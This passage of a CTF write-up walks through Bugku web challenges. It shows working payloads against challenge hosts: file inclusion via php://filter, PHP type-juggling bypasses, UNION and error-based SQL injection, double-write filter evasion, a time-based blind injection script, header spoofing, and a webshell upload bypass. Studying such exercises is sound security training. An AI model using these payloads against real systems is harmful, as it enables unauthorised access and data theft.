var p2 = '%61%61%36%34%38%63%66%36%65%38%37%61%37%31%31%34%66%31%22%3d%3d%61%2e%76%61%6c%75%65%29%72%65%74%75%72%6e%21%30%3b%61%6c%65%72%74%28%22%45%72%72%6f%72%22%29%3b%61%2e%66%6f%63%75%73%28%29%3b%72%65%74%75%72%6e%21%31%7d%7d%64%6f%63%75%6d%65%6e%74%2e%67%65%74%45%6c%65%6d%65%6e%74%42%79%49%64%28%22%6c%65%76%65%6c%51%75%65%73%74%22%29%2e%6f%6e%73%75%62%6d%69%74%3d%63%68%65%63%6b%53%75%62%6d%69%74%3b';
eval(unescape(p1) + unescape('%35%34%61%61%32' + p2));
</script>

Run unescape(p1) + unescape('%35%34%61%61%32' + p2) in the console (the same string the page passes to eval) to get the checker:

function checkSubmit(){var a=document.getElementById("password");if("undefined"!=typeof a){if("67d709b2b54aa2aa648cf6e87a7114f1"==a.value)return!0;alert("Error");a.focus();return!1}}document.getElementById("levelQuest").onsubmit=checkSubmit;

Enter 67d709b2b54aa2aa648cf6e87a7114f1 into the password box and submit to get the flag.

flag在index里 (The flag is in index)

The title already suggests a local file inclusion.

The link on the page leads to

http://123.206.87.240:8005/post/index.php?file=show.php

Asking for the file directly,

http://123.206.87.240:8005/post/index.php?file=index.php

does not help: the file is included and executed, so we only see its output, not its source. Use the php://filter stream wrapper instead:

http://123.206.87.240:8005/post/index.php?file=php://filter/read=convert.base64-encode/resource=index.php

read=convert.base64-encode applies the base64 filter while the file is read, so the PHP never runs and its source is returned encoded; resource=index.php names the target file. Base64-decode the output and the flag is in the source.

输入密码查看flag (Enter the password to see the flag)

The link says outright that this is a brute-force challenge, and the page says the password is 5 digits.

Use Burp Intruder with a Numbers payload from 10000 to 99999, step 1 (or generate the same list as a dictionary).

The password turns out to be 13579; enter it and the flag appears.

点击一百万次 (Click one million times)

The site is down now.

When I solved it earlier, sending a POST with the click count set above the threshold (a value over 100000 was enough) through HackBar was all it took: the server only checks the submitted number.

备份是个好习惯 (Backups are a good habit)

Request http://123.206.87.240:8002/web16/index.php.bak directly; the browser downloads index.php.bak, which is the source of index.php:

<?php

include_once "flag.php";
ini_set("display_errors", 0);
$str = strstr($_SERVER['REQUEST_URI'], '?');
$str = substr($str, 1);
$str = str_replace('key', '', $str);
parse_str($str);
echo md5($key1);

echo md5($key2);
if (md5($key1) == md5($key2) && $key1 !== $key2) {
    echo $flag . "取得flag";
}
?>

str_replace('key', '', $str) removes the word key in a single pass, not recursively, so kekeyy becomes key once the inner copy is removed. parse_str($str) then turns the query string into variables ($key1, $key2), which is what lets us set them at all.

The condition wants md5($key1) == md5($key2) with $key1 !== $key2. Passing arrays does it: md5() of an array emits a warning and returns NULL, so both sides are NULL and == holds, while [1] !== [2].

payload: http://123.206.87.240:8002/web16/index.php?kekeyy1[]=1&kekeyy2[]=2

Done.

成绩单 (Report card)

A textbook SQL injection.

id values 1, 2, 3 return normally.

1' order by 4# returns normally and 1' order by 5# errors, so the query has 4 columns.

Check that UNION output is displayed: -1' union select 1,2,3,4# works, so start with the database name:

-1' union select 1,2,3,database()# gives skctf_flag

Tables:

-1' union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database()#

gives fl4g,sc

Columns (0x666c3467 is the hex encoding of fl4g, which avoids quoting the name):

-1' union select 1,2,3,group_concat(column_name) from information_schema.columns where table_name=0x666c3467#

gives skctf_flag

Now the data:

id=-1' union select 1,2,3,skctf_flag from fl4g#

which returns the flag.

秋名山老司机 (Qiuming mountain driver)

The answer has to be submitted within 2 seconds, which no human manages, so a script fetches the expression, evaluates it and POSTs the result within the same session:

import requests
from bs4 import BeautifulSoup

url = "http://123.206.87.240:8002/qiumingshan/"
session = requests.session()      # the answer must arrive in the same session that got the question
r = session.get(url)
r.encoding = "utf8"
print(r.text)

soup = BeautifulSoup(r.text, "html5lib")
for div in soup.select('div'):
    calc = div.text[:-3]          # strip the trailing "=?;"
    # eval() on server-supplied text: acceptable only against a known CTF target
    result = eval(calc)
    r = session.post(url, data={"value": result})
    print(r.text)

Sometimes it fails because of network delay; run it a few more times.

速度要快 (Be quick)

The source says

<!-- OK ,now you have to post the margin what you find -->

Nothing else to go on, so capture a request.

Sending it from Repeater shows a flag header in the response, and it changes on every request:

flag: 6LeR55qE6L+Y5LiN6ZSZ77yM57uZ5L2gZmxhZ+WQpzogT0RrMU9UYzA=

base64-decoded:

跑的还不错,给你flag吧: ODk1OTc0 ("not bad, here is your flag: ODk1OTc0")

That is a lead: margin is a CSS property, so it is the parameter name the comment means, and decoding the given value once more gives the number 895974.

So we POST margin=895974. Because the value changes with every request, the fetch and the POST have to happen in one session, which a script does:

import requests
import base64

url = 'http://123.206.87.240:8002/web6/'
s = requests.session()                                   # same session for GET and POST
r = s.get(url)
first = base64.b64decode(r.headers['flag']).decode()     # "跑的还不错,给你flag吧: ODk1OTc0"
margin = base64.b64decode(first.split(':')[1].strip()).decode()   # "895974"
print(s.post(url, data={'margin': margin}).text)

Run it and the flag comes out: KEY{111dd62fcd377076be18a}

cookies欺骗 (Cookie spoofing)

The page shows a repeated string that means nothing by itself, but the address bar carries an obvious base64 value:

a2V5cy50eHQ=

which decodes to keys.txt.

Replacing it with the base64 of index.php does produce output:

http://123.206.87.240:8002/web11/index.php?line=1&filename=aW5kZXgucGhw shows one line of the PHP source per value of line, so a small script walks the file:

import requests

for i in range(30):
    url = 'http://123.206.87.240:8002/web11/index.php?line=' + str(i) + '&filename=aW5kZXgucGhw'
    r = requests.get(url)
    print(r.text, end='')   # each response is one source line and already ends with a newline

which yields:

<?php
error_reporting(0);
$file=base64_decode(isset($_GET['filename'])?$_GET['filename']:"");
$line=isset($_GET['line'])?intval($_GET['line']):0;
if($file=='') header("location:index.php?line=&filename=a2V5cy50eHQ=");
$file_list = array(
'0' =>'keys.txt',
'1' =>'index.php',
);

if(isset($_COOKIE['margin']) && $_COOKIE['margin']=='margin'){
$file_list[2]='keys.php';
}

if(in_array($file, $file_list)){
$fa = file($file);
echo $fa[$line];
}
?>

The file list allows only keys.txt and index.php; keys.php is added only when the cookie margin=margin is present. So request filename=a2V5cy5waHA= (base64 of keys.php) with Cookie: margin=margin set via HackBar, and read the page source, since the returned line is raw PHP and is not rendered.

never give up

The URL has id=1; changing it does nothing.

F12 shows

<!--1p.html-->

so look at 1p.html.

Opening it directly does not work (it redirects away), so read it as view-source:123.206.87.240:8006/test/1p.html

The source contains an encoded block. URL-decoding it gives

"<script>window.location.href='http://www.bugku.com';</script> 
<!--JTIyJTNCaWYlMjglMjElMjRfR0VUJTVCJTI3aWQlMjclNUQlMjklMEElN0IlMEElMDloZWFkZXIlMjglMjdMb2NhdGlvbiUzQSUyMGhlbGxvLnBocCUzRmlkJTNEMSUyNyUyOSUzQiUwQSUwOWV4aXQlMjglMjklM0IlMEElN0QlMEElMjRpZCUzRCUyNF9HRVQlNUIlMjdpZCUyNyU1RCUzQiUwQSUyNGElM0QlMjRfR0VUJTVCJTI3YSUyNyU1RCUzQiUwQSUyNGIlM0QlMjRfR0VUJTVCJTI3YiUyNyU1RCUzQiUwQWlmJTI4c3RyaXBvcyUyOCUyNGElMkMlMjcuJTI3JTI5JTI5JTBBJTdCJTBBJTA5ZWNobyUyMCUyN25vJTIwbm8lMjBubyUyMG5vJTIwbm8lMjBubyUyMG5vJTI3JTNCJTBBJTA5cmV0dXJuJTIwJTNCJTBBJTdEJTBBJTI0ZGF0YSUyMCUzRCUyMEBmaWxlX2dldF9jb250ZW50cyUyOCUyNGElMkMlMjdyJTI3JTI5JTNCJTBBaWYlMjglMjRkYXRhJTNEJTNEJTIyYnVna3UlMjBpcyUyMGElMjBuaWNlJTIwcGxhdGVmb3JtJTIxJTIyJTIwYW5kJTIwJTI0aWQlM0QlM0QwJTIwYW5kJTIwc3RybGVuJTI4JTI0YiUyOSUzRTUlMjBhbmQlMjBlcmVnaSUyOCUyMjExMSUyMi5zdWJzdHIlMjglMjRiJTJDMCUyQzElMjklMkMlMjIxMTE0JTIyJTI5JTIwYW5kJTIwc3Vic3RyJTI4JTI0YiUyQzAlMkMxJTI5JTIxJTNENCUyOSUwQSU3QiUwQSUwOXJlcXVpcmUlMjglMjJmNGwyYTNnLnR4dCUyMiUyOSUzQiUwQSU3RCUwQWVsc2UlMEElN0IlMEElMDlwcmludCUyMCUyMm5ldmVyJTIwbmV2ZXIlMjBuZXZlciUyMGdpdmUlMjB1cCUyMCUyMSUyMSUyMSUyMiUzQiUwQSU3RCUwQSUwQSUwQSUzRiUzRQ==-->"

The middle part is base64; decoding it gives

%22%3Bif%28%21%24_GET%5B%27id%27%5D%29%0A%7B%0A%09header%28%27Location%3A%20hello.php%3Fid%3D1%27%29%3B%0A%09exit%28%29%3B%0A%7D%0A%24id%3D%24_GET%5B%27id%27%5D%3B%0A%24a%3D%24_GET%5B%27a%27%5D%3B%0A%24b%3D%24_GET%5B%27b%27%5D%3B%0Aif%28stripos%28%24a%2C%27.%27%29%29%0A%7B%0A%09echo%20%27no%20no%20no%20no%20no%20no%20no%27%3B%0A%09return%20%3B%0A%7D%0A%24data%20%3D%20@file_get_contents%28%24a%2C%27r%27%29%3B%0Aif%28%24data%3D%3D%22bugku%20is%20a%20nice%20plateform%21%22%20and%20%24id%3D%3D0%20and%20strlen%28%24b%29%3E5%20and%20eregi%28%22111%22.substr%28%24b%2C0%2C1%29%2C%221114%22%29%20and%20substr%28%24b%2C0%2C1%29%21%3D4%29%0A%7B%0A%09require%28%22f4l2a3g.txt%22%29%3B%0A%7D%0Aelse%0A%7B%0A%09print%20%22never%20never%20never%20give%20up%20%21%21%21%22%3B%0A%7D%0A%0A%0A%3F%3E

and URL-decoding that once more gives the PHP:

";if(!$_GET['id'])
{
	header('Location: hello.php?id=1');
	exit();
}
$id=$_GET['id'];
$a=$_GET['a'];
$b=$_GET['b'];
if(stripos($a,'.'))
{
	echo 'no no no no no no no';
	return ;
}
$data = @file_get_contents($a,'r');
if($data=="bugku is a nice plateform!" and $id==0 and strlen($b)>5 and eregi("111".substr($b,0,1),"1114") and substr($b,0,1)!=4)
{
	require("f4l2a3g.txt");
}
else
{
	print "never never never give up !!!";
}


?>

The code require()s f4l2a3g.txt, so that file exists on the server and can simply be read: view-source:http://123.206.87.240:8006/test/f4l2a3g.txt

which contains the flag.
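Several of these challenges hide content behind stacked encodings: HTML numeric entities in web3, percent-escapes in web4, base64 inside base64 in 速度要快, and URL -> base64 -> URL here. The following is an added example, not part of the original writeup: a decoder that recognises each layer by its shape and keeps peeling until the text stops changing. The sample is constructed in-process with build_layers(); it is not the challenge's data, and a layer embedded in surrounding text (like the ODk1OTc0 after the colon in 速度要快) still has to be cut out by hand first.

```python
import base64
import binascii
import html
import re
from urllib.parse import quote, unquote

# Added example (not from the original writeup): strip stacked encodings by
# recognising the outermost layer from its shape.

_PCT = re.compile(r"%[0-9A-Fa-f]{2}")                       # percent-escape
_ENTITY = re.compile(r"&#(x[0-9A-Fa-f]+|\d+);|&[a-z]+;")    # HTML character reference
_B64 = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")                # base64 alphabet + padding


def _b64_text(s: str):
    """Decode s as base64 if it is well-formed and yields text, else None."""
    if not _B64.match(s) or len(s) % 4:
        return None
    try:
        out = base64.b64decode(s, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None
    # reject binary that happens to be valid UTF-8 but is not readable text
    return out if all(c.isprintable() or c in "\r\n\t" for c in out) else None


def peel_once(s: str):
    """Return (layer_name, decoded) for the outermost layer, or None if plain."""
    if _PCT.search(s):
        return "url", unquote(s)
    if _ENTITY.search(s):
        return "html", html.unescape(s)
    decoded = _b64_text(s.strip())
    if decoded is not None and decoded != s:
        return "base64", decoded
    return None


def peel(s: str, max_layers: int = 10):
    """Strip up to max_layers encodings; returns (plaintext, [layer names])."""
    layers = []
    for _ in range(max_layers):
        step = peel_once(s)
        if step is None:
            break
        name, s = step
        layers.append(name)
    return s, layers


def build_layers(plain: str, layers) -> str:
    """Apply encodings inside-out, e.g. ["url", "base64", "url"]; used to build constructed samples."""
    s = plain
    for name in layers:
        if name == "url":
            s = quote(s, safe="")
        elif name == "base64":
            s = base64.b64encode(s.encode()).decode()
        elif name == "html":
            s = "".join("&#%d;" % ord(c) for c in s)
        else:
            raise ValueError(name)
    return s


if __name__ == "__main__":
    sample = "<?php\n$flag = 'flag{constructed}';\n?>"      # constructed, not the challenge's file
    wrapped = build_layers(sample, ["url", "base64", "url"])
    print(peel(wrapped))
```

The base64 step is the only ambiguous one (short plain words like "flag" are valid base64), which is why it is tried last and only accepted when the result is printable text.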

welcome to bugkuctf

The target instance is unreachable.

过狗一句话 (One-liner past the WAF)

The target instance is unreachable.

字符?正则? (Characters? Regex?)

<?php 
highlight_file('2.php');
$key='KEY{********************************}';
$IM= preg_match("/key.*key.{4,7}key:\/.\/(.*key)[a-z][[:punct:]]/i", trim($_GET["id"]), $match);
if( $IM ){ 
  die('key is: '.$key);
}
?>

It is only a regex.

id is passed via GET and must match /key.*key.{4,7}key:\/.\/(.*key)[a-z][[:punct:]]/i:

. matches any single character except "\n"

* matches the preceding expression 0 or more times, equivalent to {0,}

{4,7} matches the preceding expression 4 to 7 times; with . that is 4 to 7 arbitrary characters

\/ matches / ; the backslash escapes the pattern delimiter

[a-z] matches a lower-case letter

[:punct:] matches any punctuation character

/i makes the match case-insensitive

Build the string piece by piece: key, nothing for .*, key, aaaa for .{4,7}, key:/a/, key for (.*key), a for [a-z], and : for the punctuation. payload: http://120.24.86.145:8002/web10/?id=keykeyaaaakey:/a/keya: returns the flag.
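The following is an added example, not part of the original writeup: the PCRE pattern from 2.php rebuilt in Python so candidate payloads can be checked offline before they are sent. PCRE's [[:punct:]] is replaced by string.punctuation, which covers the same ASCII characters; trim() and the unanchored search reproduce preg_match()'s behaviour.

```python
import re
import string

# Added example (not from the original writeup): offline check for the
# preg_match() in 2.php. [[:punct:]] -> string.punctuation (same ASCII set);
# the PHP delimiters and the escaped "/" are dropped because Python needs neither.
PATTERN = re.compile(
    r"key.*key.{4,7}key:/./(.*key)[a-z][" + re.escape(string.punctuation) + "]",
    re.IGNORECASE,
)


def passes_check(candidate: str) -> bool:
    """True when preg_match() in 2.php would return 1 for this id value."""
    return PATTERN.search(candidate.strip()) is not None   # trim() + unanchored search


def explain(candidate: str) -> str:
    """Show which substring matched and what (.*key) captured, for tuning a payload."""
    m = PATTERN.search(candidate.strip())
    if m is None:
        return "no match"
    return "match: %r, group1=%r" % (m.group(0), m.group(1))


if __name__ == "__main__":
    for c in ["keykeyaaaakey:/a/keya:", "keykeyaaakey:/a/keya:", "keykeyaaaakey:/a/keya"]:
        print(c, "->", explain(c))
```

The second and third candidates fail for different reasons (only three characters where 4 to 7 are required; no trailing punctuation), which is the kind of off-by-one explain() makes visible without a round trip to the server.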

前女友(SKCTF) (Ex-girlfriend)

Nothing obvious at first; the page source shows that the word 链接 is a link, and it leads to a page with this source:

<?php
if(isset($_GET['v1']) && isset($_GET['v2']) && isset($_GET['v3'])){
    $v1 = $_GET['v1'];
    $v2 = $_GET['v2'];
    $v3 = $_GET['v3'];
    if($v1 != $v2 && md5($v1) == md5($v2)){
        if(!strcmp($v3, $flag)){
            echo $flag;
        }
    }
}
?>

Requirements: v1 != v2, md5(v1) == md5(v2), and strcmp(v3, $flag) == 0.

v1 and v2: pick two different strings whose MD5 hashes both start with 0e followed by digits (see the list under md5 collision); == then compares the hashes as the number 0. But v3 has to equal the unknown flag.

strcmp() has a well-known weakness here: in PHP 5 and 7, passing a non-string such as an array makes strcmp() emit a warning and return NULL instead of an integer, and !NULL is true, so the check passes as if the strings were equal. (PHP 8 throws a TypeError instead.) So pass v3 as an array:

payload: http://123.206.31.85:49162/?v1=s878926199a&v2=s155964671a&v3[]=12

login1(SKCTF)

The hint says SQL constraint attack.

It is a plain login form. Registering an account and logging in gives "not admin", and the registration password rules (upper and lower case plus digits) make brute force impractical.

The SQL constraint attack: when MySQL compares strings in a CHAR/VARCHAR column, trailing spaces are ignored, and when a value longer than the column is inserted (without strict mode) it is silently truncated. So 'admin' = 'admin     ' is true.

Register a user named admin followed by enough spaces (plus any character after them, which the truncation drops) with a password of our choice. The registration's uniqueness check does not see it as the existing admin, but after insertion the stored name is 'admin' plus spaces, and the login query WHERE username='admin' matches the new row with our password, so the admin check passes and the flag appears.

你从哪里来 (Where do you come from)

The page asks whether I come from Google. Intercept with Burp and add Referer: https://www.google.com ; the page then agrees that I come from Google and returns the flag.

md5 collision(NUPT_CTF)

The challenge is titled MD5 collision and asks for a parameter a. ?a=1 returns false, so pass a string whose MD5 begins with 0e and the flag appears.

payload: http://123.206.87.240:9009/md5.php?a=s878926199a

Strings whose MD5 begins with 0e

I have done several md5 collision challenges, so here is the list I keep (input on one line, its MD5 on the next):

s878926199a
0e545993274517709034328855841020
s155964671a
0e342768416822451524974117254469
s214587387a
0e848240448830537924465865611904
s1091221200a
0e940624217856561557816327384675
s1885207154a
0e509367213418206700842008763514
s1502113478a
0e861580163291561247404381396064
s1836677006a
0e481036490867661113260034900752
s1184209335a
0e072485820392773389523109082030
s1665632922a
0e731198061491163073197128363787
s532378020a
0e220463095855511507588041205815
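The following is an added example, not part of the original writeup: it verifies the table above with hashlib and shows how such inputs are found in the first place, by enumerating candidates of the same s<number>a shape and keeping those whose digest is 0e followed only by digits. The search space in candidates() is constructed here; a full search from scratch needs on the order of hundreds of millions of hashes, which is why people keep lists like the one above.

```python
import hashlib
import re
from typing import Iterable, Iterator

# Added example (not from the original writeup). A "magic" MD5 digest is
# 0e followed only by decimal digits; PHP's == reads two such strings as the
# number 0, so they compare equal.
MAGIC = re.compile(r"^0e\d+$")

# the writeup's table, deduplicated
KNOWN_MAGIC_MD5 = {
    "s878926199a": "0e545993274517709034328855841020",
    "s155964671a": "0e342768416822451524974117254469",
    "s214587387a": "0e848240448830537924465865611904",
    "s1091221200a": "0e940624217856561557816327384675",
    "s1885207154a": "0e509367213418206700842008763514",
    "s1502113478a": "0e861580163291561247404381396064",
    "s1836677006a": "0e481036490867661113260034900752",
    "s1184209335a": "0e072485820392773389523109082030",
    "s1665632922a": "0e731198061491163073197128363787",
    "s532378020a": "0e220463095855511507588041205815",
}


def md5_hex(s: str) -> str:
    return hashlib.md5(s.encode()).hexdigest()


def is_magic(digest: str) -> bool:
    """True when PHP == would treat the digest as the number 0."""
    return MAGIC.match(digest) is not None


def verify_table(table=KNOWN_MAGIC_MD5) -> bool:
    """Every listed input hashes to the listed digest, and every digest is magic."""
    return all(md5_hex(k) == v and is_magic(v) for k, v in table.items())


def candidates(start: int, stop: int) -> Iterator[str]:
    """The s<number>a shape used by the table (constructed search space)."""
    for n in range(start, stop):
        yield "s%da" % n


def find_magic(inputs: Iterable[str], limit: int = 1) -> list:
    """Return up to `limit` inputs from `inputs` whose MD5 is magic."""
    found = []
    for s in inputs:
        if is_magic(md5_hex(s)):
            found.append(s)
            if len(found) >= limit:
                break
    return found


if __name__ == "__main__":
    print("table verified:", verify_table())
    print(find_magic(candidates(878926190, 878926200)))
```

Any two entries work as v1/v2 in 前女友 or as key1/key2 in 备份是个好习惯, because == compares their digests as 0 == 0; the same comparison with === (or hash_equals()) fails, which is the fix.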

程序员本地网站 (Programmer's local site)

Same as 管理员系统 above: add X-Forwarded-For: 127.0.0.1 to the request headers.

各种绕过 (Assorted bypasses)

<?php
highlight_file('flag.php');
$_GET['id'] = urldecode($_GET['id']);
$flag = 'flag{xxxxxxxxxxxxxxxxxx}';
if (isset($_GET['uname']) and isset($_POST['passwd'])) {
    if ($_GET['uname'] == $_POST['passwd'])

        print 'passwd can not be uname.';

    else if (sha1($_GET['uname']) === sha1($_POST['passwd'])&($_GET['id']=='margin'))

        die('Flag: '.$flag);

    else

        print 'sorry!';

}
?>

Needed: id=margin, uname != passwd, and sha1(uname) === sha1(passwd). (The condition joins them with the bitwise & rather than &&, but with boolean operands that behaves the same.)

While looking for inputs with equal SHA-1 hashes I found the array trick instead:

sha1() of an array emits a warning and returns NULL, so uname[]=1&passwd[]=23 gives NULL === NULL, while the two arrays themselves are not == (the numbers inside are arbitrary).

payload: GET http://123.206.87.240:8002/web7/?id=margin&uname[]=1 with the POST body passwd[]=23

and the flag is returned.

web8

The hint says txt???; the page shows its source:

<?php
extract($_GET);
if (!empty($ac))
{
$f = trim(file_get_contents($fn));
if ($ac === $f)
{
echo "<p>This is flag:" ." $flag</p>";
}
else
{
echo "<p>sorry!</p>";
}
}
?>

Look at flag.txt: it contains flags

extract($_GET) turns every query parameter into a variable, so we control both $fn (the file name) and $ac (the expected content): ac must equal the trimmed content of the file named by fn. fn=flag.txt and ac=flags satisfy it.

payload: http://123.206.87.240:8002/web8/?ac=flags&fn=flag.txt

and the flag appears.

细心 (Be careful)

The target instance is unreachable.

求getshell (Get a shell)

The page wants an image file, not PHP: a file-upload challenge.

Uploading a one-line webshell directly returns a file error. Intercepting with Burp there are two obvious things to change: the file name and the part's Content-Type. An image Content-Type gets through, and the file name can be tried extension by extension, but nothing worked until I noticed that the request's own top-level Content-Type header is checked as well; changing the case of that header (e.g. content-type) gets the upload past the check.

INSERT INTO注入 (INSERT INTO injection)

<?php
error_reporting(0);

function getIp(){ //get the client IP
$ip = '';
if(isset($_SERVER['HTTP_X_FORWARDED_FOR'])){ //read HTTP_X_FORWARDED_FOR from the request headers
$ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
}else{
$ip = $_SERVER['REMOTE_ADDR'];
}
$ip_arr = explode(',', $ip);
return $ip_arr[0];

}

$host="localhost";
$user="";
$pass="";
$db="";

$connect = mysql_connect($host, $user, $pass) or die("Unable to connect");

mysql_select_db($db) or die("Unable to select database");

$ip = getIp();
echo 'your ip is :'.$ip;
$sql="insert into client_ip (ip) values ('$ip')"; //the statement we inject into
mysql_query($sql);

Start from the source the challenge gives: the X-Forwarded-For header goes straight into an INSERT, and nothing from the database is echoed back, so there is no error-based or union-based channel. The hint says to write a Python script; the only feedback available is timing, so this is a time-based blind injection.

import requests

dic = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ_'
# payload for the database name
payload_db = "1'+(select case when (substr(database() from {0} for 1)='{1}') then sleep(6) else 1 end)+'1"
# payload for the number of tables
payload_tb_num = "1'+(select case when (select count(*) from information_schema.TABLES where TABLE_SCHEMA='{0}')='{1}' then sleep(6) else 1 end)+'1"
# payload for a table name's length. The length step is optional: guess characters
# directly and stop when no character triggers a timeout any more.
payload_tb_name_len = "1'+(select case when (select length(TABLE_NAME) from information_schema.TABLES where TABLE_SCHEMA='{0}' limit 1 offset {1}) = '{2}' then sleep(6) else 1 end)+'1"
# payload for the table name itself
payload_tb_name = "1'+(select case when (substr((select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA='{0}' limit 1 offset {1}) from {2} for 1)) = '{3}' then sleep(6) else 1 end)+'1"
url = 'http://123.206.87.240:8002/web15/'


def slept(payload):
    """True when the injected sleep(6) fired, i.e. the request hit the 5 s timeout."""
    try:
        requests.get(url, headers={'x-forwarded-for': payload}, timeout=5)
        return False
    except requests.exceptions.ReadTimeout:
        return True


# database name
db_name = ''
for i in range(1, 6):
    for j in dic:
        if slept(payload_db.format(i, j)):
            print(payload_db.format(i, j))
            db_name += j
            break
print('db_name: ' + db_name)   # web15

# number of tables
tb_num = 0
for i in range(1, 50):
    if slept(payload_tb_num.format(db_name, str(i))):
        tb_num = i
        print('tb_num: ' + str(i))
        break
# two tables

# table names
for i in range(tb_num):
    # length first (name_len rather than len, so the builtin is not shadowed)
    name_len = 0
    for j in range(50):
        if slept(payload_tb_name_len.format(db_name, i, j)):
            name_len = j
            break
    print('No.' + str(i + 1) + ' table has length: ' + str(name_len))
    # then the name, one character at a time
    tb_name = ''
    for k in range(1, name_len + 1):
        for j in dic:
            if slept(payload_tb_name.format(db_name, i, k, j)):
                print(payload_tb_name.format(db_name, i, k, j))
                tb_name += j
                break
    print(tb_name)
# the two tables are flag and client_ip

I am not good at Python; this script came from the internet, I ran it myself and it works, and it is easy enough to read and adapt.

import requests

url = "http://123.206.87.240:8002/web15/"
flag = ""
# characters to try; extend it if the stored value uses others (a quote would break the SQL)
charset = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ_,!@#$%^&*``."

for i in range(1, 33):          # assumes a value of at most 32 characters
    for ch in charset:
        # the closing ")" ends the INSERT's values('...') and "#" comments out the rest
        data = "1' and (case when (substr((select group_concat(flag) from flag) from " + str(i) + " for 1 )='" + ch + "')"
        data += " then sleep(4) else 1 end )) #"
        headers = {'X-Forwarded-For': data}
        try:
            requests.get(url, headers=headers, timeout=3)
        except requests.exceptions.ReadTimeout:
            flag += ch
            print(flag)
            break
print(flag)

Run it and the flag comes out.

这是一个神奇的登陆框 (A magical login box)

Just a login form; the URL mentions sql, so presumably another injection challenge. Find the injection point:

1" produces an error:

Try Again!
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1"' at line 1

1" # is fine again, so the value is enclosed in double quotes.

1" order by 2 # is fine; 1" order by 3 # returns

Unknown column '3' in 'order clause'

so two columns.

Check the UNION: -1" union select 1, 2 #

returns

Good Job!
Login_Name:1
You must login with correct ACCOUNT and PASSWORD!

Database:

-1" union select database(),2#

gives bugkusql1

Tables:

-1" union select group_concat(table_name),2 from information_schema.tables where table_schema=database()#

gives flag1,whoami

Columns:

-1" union select group_concat(column_name),2 from information_schema.columns where table_name='flag1'#

gives flag1

Data:

-1" union select group_concat(flag1),2 from flag1 #

and the flag comes out.

-1" union select *,2 from flag1 #

also works and skips the column lookup; it only matches the two-column query because flag1 has exactly one column.

多次

进去地址栏又个id=1改了会显示不同的字一直到5,之后就出现

Error,Error,Error!

很明显的注入题

id=5的时候他让我给我尝试sql注入,那就直接开始

id=1'报错

id=1"不报错

所以是'闭合

确定存在注入点

试了一下发现是有过滤的

用异或注入来判断一下

payloadhttp://123.206.87.240:9004/1ndex.php?id=1'^(length('and')!=0)--+

判断出来过滤了and,or,union,select

这边可以用双写绕过

order by来判断字段数http://123.206.87.240:9004/1ndex.php?id=1' oorrder by 2 --+

2的时候不报错3的时候报错了

手历一下

http://123.206.87.240:9004/1ndex.php?id=-1' ununionion seselectlect 1,2 --+

Shows 2.

Dump the database:

http://123.206.87.240:9004/1ndex.php?id=-1' ununionion seselectlect 1,database() --+

web1002-1

Dump the tables

http://123.206.87.240:9004/1ndex.php?id=-1' ununionion seselectlect 1,group_concat(table_name) from infoorrmation_schema.tables where table_schema="web1002-1"--+

flag1,hint

Dump the columns

http://123.206.87.240:9004/1ndex.php?id=-1' ununionion seselectlect 1,group_concat(column_name) from infoorrmation_schema.columns where table_name="flag1"--+

flag1,address

Read the data

http://123.206.87.240:9004/1ndex.php?id=-1' ununionion seselectlect 1,group_concat(flag1) from flag1--+

usOwycTju+FTUUzXosjr

Tried it and this is not the flag, so grab the data in address instead.

http://123.206.87.240:9004/1ndex.php?id=-1' ununionion seselectlect 1,group_concat(address) from flag1--+

This gives the address of the next level.
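The double-write bypass above works because the server strips each banned keyword exactly once and then still concatenates the result into the query. This added example (not from the challenge or the original post) reproduces that filter against a constructed SQLite table standing in for flag1, shows the stripped payload that survives it, and contrasts it with parameter binding, which makes the same payload harmless; the table contents and the filter regex are assumptions.

```python
import re
import sqlite3

# Constructed stand-in for the challenge's flag1 table (not the real data).
SCHEMA = [
    "CREATE TABLE flag1 (id INTEGER, flag1 TEXT, address TEXT)",
    "INSERT INTO flag1 VALUES (1, 'row-one', 'one.php')",
    "INSERT INTO flag1 VALUES (2, 'row-two', 'two.php')",
]

def naive_filter(value: str) -> str:
    """Single-pass keyword stripping (assumed to mirror the challenge's filter).
    Each keyword is removed once, so 'ununionion' collapses back to 'union'."""
    return re.sub(r"union|select|and|or", "", value, flags=re.IGNORECASE)

def filtered_query(value: str) -> str:
    """Vulnerable pattern: the filtered value is still spliced into the SQL text."""
    return f"SELECT id, flag1 FROM flag1 WHERE id='{naive_filter(value)}'"

def safe_lookup(conn: sqlite3.Connection, value: str) -> list:
    """Hardened pattern: the value is bound as a parameter and never parsed as SQL."""
    return conn.execute("SELECT id, flag1 FROM flag1 WHERE id=?", (value,)).fetchall()

def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    for stmt in SCHEMA:
        conn.execute(stmt)
    return conn

def demo() -> tuple:
    """Returns (what the filter lets through, rows leaked by the vulnerable query,
    rows returned by the parameterised query) for the page's double-written payload."""
    payload = "-1' ununionion seselectlect 1,group_concat(flag1) from flag1--"
    conn = make_db()
    stripped = naive_filter(payload)
    leaked = conn.execute(filtered_query(payload)).fetchall()
    safe = safe_lookup(conn, payload)
    return stripped, leaked, safe
```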

id is again passed via the URL.

Single-quote closure, so the injection point is there.

This level filters double-writing and case variation as well, so use error-based injection.

http://123.206.87.240:9004/Once_More.php?id=1' order by 2--+ returns normally

3 errors: Unknown column '3' in 'order clause'

So there are two columns.

Dump the database

http://123.206.87.240:9004/Once_More.php?id=1' and (extractvalue(1,concat(0x7e,database(),0x7e)))--+

Returns XPATH syntax error: '~web1002-2~'

Dump the tables

http://123.206.87.240:9004/Once_More.php?id=1' and (extractvalue(1,concat(0x7e, (select group_concat(table_name) from information_schema.tables where table_schema="web1002-2"),0x7e)))--+

Returns XPATH syntax error: '~class,flag2~'

Dump the columns

http://123.206.87.240:9004/Once_More.php?id=1' and (extractvalue(1,concat(0x7e, (select group_concat(column_name) from information_schema.columns where table_name="flag2"),0x7e)))--+

Returns XPATH syntax error: '~flag2,address~'

Read the data

http://123.206.87.240:9004/Once_More.php?id=1' and (extractvalue(1,concat(0x7e, (select group_concat(flag2) from flag2),0x7e)))--+

